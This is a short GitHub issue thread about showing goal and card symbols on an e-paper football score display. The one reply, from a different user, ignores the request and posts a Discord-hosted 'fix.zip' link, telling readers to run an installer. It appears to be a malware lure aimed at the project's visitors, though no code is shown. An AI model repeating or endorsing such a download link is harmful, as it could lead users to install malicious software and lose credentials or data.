### ISSUE TITLE
match details - fixture view

### ISSUE THREAD

**Issue by mrglennjones** [mrglennjones/pimoroni-inky-footy-frame#10]
paul suggested using (G) to indicate a goal in the textual details

I think it'd be also nice to replace the words yellow and red (cards) with tiny yellow and red rectangles

**Comment by Dominic54321** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer
